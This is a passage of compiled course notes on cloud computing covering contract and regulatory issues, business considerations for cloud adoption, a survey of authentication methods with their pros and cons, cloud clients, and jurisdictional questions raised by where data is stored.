Also, identify the remedies available for service failure – it’s common for providers to offer credit for additional services, despite the fact that it’s hard to see ‘more of the same’ as a valuable remedy.

Cloud contracts: 5 - Regulators are taking notice

If you are a regulated entity, you will need to take account of relevant regulatory guidance. For example, the FCA published draft guidance on cloud computing in November 2015 (due to be published in final form this year). This high level guidance is aimed at ensuring regulated firms appropriately identify and manage risks relating to the deployment of cloud-based solutions. Issues identified in the guidance include:

• legal and regulatory considerations• risk management• oversight and audit• data privacy and security• change management• business continuity• exit

Cloud contracts: Conclusion

Ultimately, you need to approach cloud transactions with a heavy dose of pragmatism, accepting that it may be very difficult to negotiate material changes to a cloud provider’s terms.

You need to carry out a thorough risk/benefit analysis exercise in order to evaluate whether the particular cloud solution is right for your business. If you perceive the risks to be so great that significant contract negotiation seems essential before putting services in the cloud, it may be that cloud isn’t the right solution for you after all.

9. Commercial and Business consideration in cloud computing

Cloud computing technology has improved significantly in the past year, making it an appealing tool for businesses of all sizes. Cloud computing can benefit businesses in many ways, from cutting costs, to increasing business efficiency, to guaranteeing data recovery in case of an accident. In fact, 47 percent of medium and large enterprises say increased efficiency is the main benefit of cloud computing, according to a new survey data on enterprise cloud computing.

What common mistakes should companies be aware of as they begin the migration process? What steps should they take when implementing cloud infrastructure? Moving to the Cloud can be complicated. Not all data, applications, and files are suited for cloud storage and security issues may arise if proper safeguards are not implemented properly.

Some common cloud implementation mistakes include,

· Solely relying on in-house resources

· Selecting a cloud service provider that does not meet you company’s needs

· Starting off with a complex cloud solution before acquiring the necessary knowledge and resources to maintain and secure the system properly

Three crucial considerations will help businesses navigate these mistakes as they prepare to adopt cloud infrastructure.

1. DETERMINE BUSINESS’ CLOUD COMPUTING NEEDS AND GOALS

Before adopting a new technology, the crucial question to ask is, “How can it meet the company’s needs?”

These considerations require evaluating the following:

· Type and breadth of data a company needs to store

· Tasks they need to accomplish

· Level of security and privacy they need to maintain

· Standards and regulations to which they need to be compliant

· Features they need to ensure quality performance and enhanced business function.

For example, if a company is choosing between the big four cloud providers – Amazon Web Services (AWS), Microsoft Azure, Google Cloud, and IBM Cloud – AWS may stand out because of its reputation as the cloud computing service that dominates the market. However, if the company already uses Microsoft applications, Azure may be the better choice.

“The most popular cloud vendor is Amazon. They are ahead of the game because they offer services that are easy to implement and use. Then, Microsoft Azure and Google follow Amazon. … But, if a company or enterprise is attached to Microsoft products, then Microsoft Azure may be a better fit for them. It depends on the company’s requirements.” – Jose Alvarez, director of IT infrastructure, Auxis

2. CHOOSE A CLOUD SOLUTION THAT MEETS YOUR COMPANY’S NEEDS

The three cloud systems, public, private, and hybrid, have advantages and disadvantages. Before adopting cloud infrastructure, it is important for businesses to understand the similarities and differences of each cloud solution in order to select the type that is most appropriate for their business goals.

First, the public cloud provides resources publicly over the Internet. While data scalability and price flexibility are key advantages of this cloud solution, a business that does not know how to monitor data security risks security breaches.

Second, private cloud solutions service a single company and are managed in-house by the IT department. The main advantage of the private cloud is the high level of security it offers. Businesses are responsible for the infrastructure. However, maintaining a private cloud solution is more expensive and less flexible than the public cloud.

Third, hybrid cloud solutions combine characteristics from both public and private clouds. However, a business needs a knowledgeable IT staff on-hand to combat the complexities inherent in this solution.

3. EVALUATE KNOWLEDGE AND RESOURCE GAPS IN IT DEPARTMENT

Especially in the SMB market, cloud infrastructure adoption often slows due to a fear of the Cloud. One explanation for this fear is the lack of knowledge and resources available in-house to implement and maintain cloud solutions, according to David Amaya, a consultant at Cardinal Solutions.

“Many [businesses] know just enough about the Cloud to be afraid of it and say, ‘I’m not touching that.’” – David Amaya

Another explanation highlights ever-present security and compliance concerns.

“I see the challenge of cloud security as an educational issue. People have to understand and learn more about the Cloud to use it effectively.” – Randy Bias, vice president of technology at EMC

To ensure your IT department can confront this fear of the cloud head on, it is necessary to consider the following questions:

· Does the company have a dedicated IT team in-house?

· What roles will the IT team play after cloud infrastructure implementation?

· What additional resources and training are needed to prepare the IT team for the transition?

TAKEAWAYS

Cloud computing opens up numerous opportunities for businesses, and the complexities inherent in adopting cloud infrastructure should not dissuade businesses from embracing this technology. Outlining business needs and goals, comparing these needs to the cloud solutions and services available, and determining the resources required to facilitate the transition are key to a successful and effective cloud implementation process.

10. Authentication in cloud computing:

Authentication

Authentication is the process that allows the user to provide proof of his identity. It is often done through the login method, based on the using of a username and a password. This static mechanism leaves the system vulnerable to attacks, since hackers can use many techniques, such as sniffing and guessing, to steal user passwords . So, to alleviate the problems associated with identity theft, it is essential to adopt a strong form of authentication techniques.

The user authentication is generally based on three factors, something he knows, who is he and what he possess. Something he know may be a password, a pass phrase, a pin number or a secret question. Face recognition, iris scan or the other authentication methods based on body parts allow to identify who is the user. Finally, something that the user possesses may be a smart card, a software token or even a mobile phone. When authentication is performed by combining two or more of the factors presented above, it is named a two or a multiple factor authentication.

3.2.1. General mechanisms used in Authentication:

3.2.1.1. Authentication by password

The login and the password are confidential information that the user employs in order to access a specific service (mailbox, shopping sites, etc.). This is the weakest authentication and identification mechanism, because it is possible to intercept the password in transit or when it is typed on the keyboard.

· Typology of passwords

•Simple and easy to remember password: The choice of the password is often left free to the user. Most users simply use an easy-to-remember password. However, it is easy to be guessed.

•Complex passwords: A complex password is hard to be guessed. It combines numbers and letters, with uppercase and special characters.

•Identifiers and passwords with a lifetime: Although complex passwords are more secure than simple ones, several mechanisms can be used to break them. To reinforce the security policy, a password expiration period must be imposed. Thanks to the lifetime technique, a hacked password cannot be used indefinitely.

•One time password (OTP): By adopting the OTP mechanism, the password will be unique, automatically generated, random and can only be used once. For each access request, a new password will be sent to the user, via SMS or email.

•Encrypted password: During communication between user and server, the password is encrypted so as not to be revealed to a third party during transit or recording.

· Uses of passwords

•Unique password: Single sign-on allows to use the same password to access all services and applications, For example, one password can be used to access both mailbox and social network.

•Multiple passwords: Adopting the technique of multiple passwords allows to specify, one password per service depending on the confidentiality of the secret to protect .

3.2.1.2. Authentication by Captcha or image scan

•Captcha: This is a sequence of characters that the user must type to prove that he is not a robot.

•Image scan: When a user is connected to a service from the laptop and want to be connected from the smartphone, the system provides to him an image that must be scanned by this smartphone to access the service without having to remake the whole authentication procedure.

3.2.1.3. Authentication by address, MAC or IP

•Authentication by MAC address: The authentication by MAC address allows to authenticate the machine, not the person. It is a particularly effective method of authenticating users who usually have access to their accounts from a regular set of machines.

•Authentication by IP address: The authentication is successful or not depending on the network from which the access requestor is connected.

3.2.1.4. Biometrics

Biometrics illustrated in Fig. 2 can be used to identify a user through his physiological characteristics such as face, iris and fingerprint, or behavioral characteristics such as gestures and signature. Everyone has his own unique biometric feature. However, it can change over time (age, accident, injury, etc.).

Fig. 2. Biometrics

· Methods based on physical characteristics

•Face recognition: Authentication by face recognition is a widespread technique. The significant features for face recognition are: eyes, mouth and face shape. During the identification, the low frequency components contribute to the overall description and allow to determine the sex of the user. On the other hand, the high frequency components are more important for the authentication task.

•Iris scan: The detailed texture of the iris is specific to each individual. Moreover, this texture is stable and cannot be modified without significant loss of visual capacities.

•Finger scan: This is one of the first biometrics used in context of authentication, and the most mature technology. The fingerprints are unique to each person, and even to each finger. The fingerprint image is taken using a specific image acquisition device.

· Methods based on behavioral characteristics

•Gestures scan: The authentication is done by hand gestures. Specifically, the position of the fingers may be in the form of V, W, etc.

•Digital signature: A signature consists of a fixed and variable parts. Authentication using signature allows to identify a user from the fixed part of his signature, from the pressure exerted with the pen and also from the writing speed. This solution requires the use of a touch screen equipment and a stylus.

3.2.1.5. Data encryption

This is a good authentication, avoiding the identity theft and the replay of an authentication. It implements a proof of possession of a secret element (cryptographic key), by means of an authentication protocol guaranteeing the confidentiality of the secret element . Encryption is also an indispensable tool for protecting information in computer systems.

3.2.1.6. Two factor and multi-factor authentication

Two-factor or multi-factor authentication provides strong authentication by the combination of two or more of the solutions presented above.

3.2.1.7. Multilevel authentication

The multi-level authentication reinforces security by authenticating user at several levels. The authentication process is made, for example, at the organization level, then at the team level, and finally at the user level.

3.2.1.8. Authentication duration

Regardless of the used authentication method, when the user fails to authenticate himself in the defined authentication duration, the action is recorded as fraudulent and therefore access will be refused for him thereafter.

3.2.2. Models specific to Cloud

3.2.2.1. Trust

Trust is currently used in Cloud Computing as a means of authentication. Depending on the adopted security policy and the trust level of the user, which judges his behavior, the authentication is accepted or refused.

3.2.2.2. Trusted third party (TTP)

A trusted third party (TTP) is an entity used in the context of the Cloud to facilitate and secure interactions between two parties (consumer and provider) that both trust this third party. It can manage authentication, control access to resources, and more.

Table 3. Advantages and disadvantages of authentication models and mechanisms.

Authentication models and mechanisms

Advantages

Disadvantages

General models and mechanisms

Password

Simple password

- Cost-effective.

-Easy to use and retain.

- Easy to be found by a pirate.

Complex password

-Guessed with difficulty.

- Forgetfulness.

-Not very robust, reusable by an attacker.

Password with lifetime

-The password discovered by a malicious user, will not be usable indefinitely in time.

-Possibility to find it after each renewal.

OTP

-No forgetting and reuse, dynamism, and randomization.

- Little comfort of use.

-The use of the password by a hacker before the concerned person.

Encrypted password

-Difficult to be intercepted.

-Possibility to be seen when typing and authentication reply.

Unique password

-Easy authentication and password memorization.

- The hacking of one account involves hacking of all other accounts at once.

Multiple passwords

- The hacking of an account does not impact other accounts.

- Difficult to remember.

Captcha/scan

Captcha

- Countermeasure against DOS attacks.

- Unsecured method.

Image scan

- Flexibility and simplicity.

- Possibility to scan the image from the computer by a nearby pirate.

@ MAC/IP

MAC address

- Simple filtering.

- Authentication is authorized to a limited number of machines.

- Access to the authenticated machine by a hacker.

-Tedious in a large network.

IP address

-Simple to use.

-Problem in the case of need to be connected from another network.

Biometrics

Face recognition

-No forgetfulness.

- Variations caused by makeup, aging and expression of emotions.

- Easily counterfeited.

-The need for a camera.

Iris scan

-Solution less binding.

-Possibility to photograph the iris pattern for later usurpation.

- Necessity to purchase the device.

Finger scan

-Mature technology, less intrusive, processing relatively fast.

-The need for a specific image acquisition device.

-Problem in case of injured or dirty fingers.

Gestures scan

-Easy to use.

-The need for a camera.

Digital signature

-Easy to remember.

- Necessity of a touch screen.

-The writing changes during the life of the individual.

Encrypted data

- High-level authentication.

- Calculation time.

-Unable to manage and inspect the client process.

Multi-factor authentication

-A strong authentication.

- Complex.

Multilevel authentication

-Authentication verified on several levels.

- Authentication problem at the high-level (organization), impacts the authentication of all users.

Authentication duration

-Securing user accounts.

- Even if the user is authentic, when he has difficulties to be connected, he will be impacted.

Models specific to Cloud

Trust

-Dynamic management of authentication corresponding to the user behavior.

- Not enough, the behavior of the user may change over time.

TTP

-Management of authentication by a neutral third party.

-Difficulty of trusted third-party choice.

11. Client access in cloud:

A Cloud Client consists of computer hardware and/or software that relies on cloud computing for application delivery. A Cloud Client could also be specifically designed for delivery of cloud services. In either case, the Cloud Client is essentially useless without Cloud Services. Examples of Cloud Clients include some computers, phones and other devices, operating systems and browsers.

Users access cloud services by using networked cloud client devices, such as desktop computers, laptops, tablets and smartphones. Some cloud clients rely on cloud computing for all or a majority of their applications so as to be essentially useless without it. Examples are thin clients and the browser-based Chromebook. Many cloud applications do not require specific software on the client and instead use a web browser to interact with the cloud application. With Ajax and HTML5 these Web user interfaces can achieve a similar or even better look and feel as native applications. Some cloud applications, however, support specific client software dedicated to these applications (e.g., virtual desktop clients and most email clients). Some legacy applications (line of business applications that until now have been prevalent in thin client Windows computing) are delivered via a screen-sharing technology.

12. Jurisdictional issues raised by data location :

The legal issues that frequently arise in the cloud are wide-ranging. However, attempting a broad generalisation, mainly four types of issues arise therein:

1. Privacy of data and data security

2. Issues relating to contractual relation between the cloud service provider and the customer

3. Complex jurisdictional issues, or issues relating to the location of the data and the set of laws applicable

4. Commercial as well as business considerations

At the outset, it may very well be clarified that though cloud computing enables the customer access to computing, networking, storage resources just like traditional outsourcing services and Application Service Providers (ASPs), it has a legal nature quite different from these two owing to its distinctive features like ‘on-demand access’, and ‘unit-based pricing’ (pay-per-use).

Privacy and data security issues:

Seemingly, the main privacy/data security issue relating to the cloud is ‘data breach’. Data breach may be in the generic sense defined as the loss of unencrypted electronically stored personal information (Buyya, Broberg, & Goscinski, 2015). A data breach can cause loss to both the provider as well as the customer in numerous ways; with identity theft and chances of debit/credit card fraud to the customer, and financial harm, loss of customer, loss of reputation, potential lawsuits et cetera for the provider.

The American law requires data breach notification to be issued of affected persons in such case of a data breach. Almost all the states in the United States now require notification of affected persons upon the occurrence of a data breach.

Talking about the Indian scenario, most of the providers are seen to attempt at lessening their risk liability in case of a data breach scenario. However, as more sensitive information is entering the cloud every passing day, businesses and corporations have started negotiating the contracts so as to insert terms that expand the contractual obligations of the providers.

Problem arises when the data is subject to more than one jurisdictions, and the jurisdictions have different laws regarding data privacy. For example, the European Union Data Privacy Directive clearly states that ‘Data cannot leave the EU unless it goes to a country that ensures an “adequate level of protection”.’ Now, although such statement makes the EU provisions easily enforceable, but it restricts the data movement thereby reducing the data efficiency.

Contracting Issues:

Clearly, licensing agreements are fundamentally different from Service agreements. Cloud essentially, in all its permutations (IaaS, PaaS, SaaS), is a service, and therefore is governed by a Service agreement instead of a Licensing agreement.

However, the main issue regarding the Cloud Service agreements is ‘contract of adhesion’. Owing to the limited expansion of Cloud Services in India, most of the time the ‘Click-wrap agreement’ model is used, causing the contract to be one of the contract of adhesion. It leaves no or little scope for negotiation on the part of the user/customer.

With the expansion of the Cloud computing, gradually the negotiation power of the large corporation will cause the Cloud Contracts to be standard and negotiated ones. However, at an individual level, this is still a far destination.

Legal provisions clearly cannot force the cloud providers to have a negotiating session with each and every customer. However, legal provisions may be made to ensure that the liability and risk responsibility clauses follow a standard pattern which compensates the user for the lack of negotiation during the formation of the contract.

Jurisdictional Issues:

Jurisdiction is the authority of a court to judge acts committed in a certain territory. Jurisdiction in case of legal issues relating to the Cloud services becomes difficult and critical because of the features of Cloud like ‘Virtualization’, and ‘Multi-tenancy’.

While virtualization ensures the requirement of less hardware and consumption of less power thereby ensuring computing efficiency, it also on the other hand makes it difficult for the cloud user or the cloud provider to know what information is housed on various machines at any given time.

Multi-tenancy refers to the ability of a cloud provider to deliver services to many individuals or organisations from a single shared software. The risk with this is that it makes it highly possible that the data of one user may be accessed in an unauthorised manner by another user since the data of various users are only virtually separated and not physically. Also, it makes it difficult to back up and restore data.

The cloud enables a great deal of flexibility in data location, which ensures maximum efficiency in data usage and accessibility. However, it creates a number of legal issues as well. It makes it quite possible a scenario that the same data may be stored in multiple locations at a given time. Now, if the multiple locations are subject to different jurisdiction and different legal system, there arises a possibility that there may be conflicting legal provisions regarding data in the two aforementioned different locations. This gives rise to most of the jurisdictional issues in Cloud computing.

Also, laws relating to confidentiality and Government access to data are different across different nations. While the Indian laws manage to strike a balance between national security and individual privacy, most of the nations do not prefer a balance and have adopted a biased view on this. Problem of conflict of laws arises herein, in such cases.

Commercial and Business Considerations:

Other commercial and business considerations like the urge to minimize risk, maintain data integrity, accessibility and availability of data as well as Service level Agreements have also significantly shaped the present as well as future of Cloud Computing in India. It also creates a number of foreseeable as well as unforeseeable issues that needs to be addressed by dedicated legislations therefor.

It is an accepted truth that Law always lags behind technical innovations, and the complexities of the Cloud innovations and related Cloud Services like Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) will force the law and legislations to catch up in order for an effective legal system that provides legal remedies to prevent and redress the resultant harms.

Raising awareness, ensuring universal access to information, and resource mobilizing are complimentary solutions that’ll never go wrong for the Indian scenario in order to add to the effectiveness of an effective legal system.

Documents

gecnilokheri.ac.ingecnilokheri.ac.in/GPContent/Unit-IV Cloud computing 8th … · Web viewUnit IV Cloud Computing. Data Privacy & Security in Cloud Computing. Cloud technology has